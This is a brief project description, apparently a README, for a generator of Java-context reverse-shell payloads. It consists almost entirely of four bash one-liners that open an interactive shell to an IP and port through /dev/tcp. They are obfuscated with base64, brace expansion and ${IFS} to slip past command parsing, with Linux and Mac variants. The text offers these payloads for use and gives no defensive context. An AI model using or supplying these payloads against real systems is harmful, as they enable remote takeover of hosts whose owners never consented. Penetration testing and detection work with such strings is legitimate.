The project work on generating payloads to reverse shell in different contexts of java.
Linux: bash -c {echo,BASE64(bash -i >& /dev/tcp/IP/PORT 0>&1)}|{base64,-d}|{bash,-i}
MAC: bash -c {echo,BASE64(bash -i >& /dev/tcp/IP/PORT 0>&1)}|{base64,-D}|{bash,-i}
bash -c bash${IFS}-i${IFS}>&/dev/tcp/IP/PORT<&1
bash -c $@|bash 0 echo bash -i >& /dev/tcp/IP/PORT 0>&1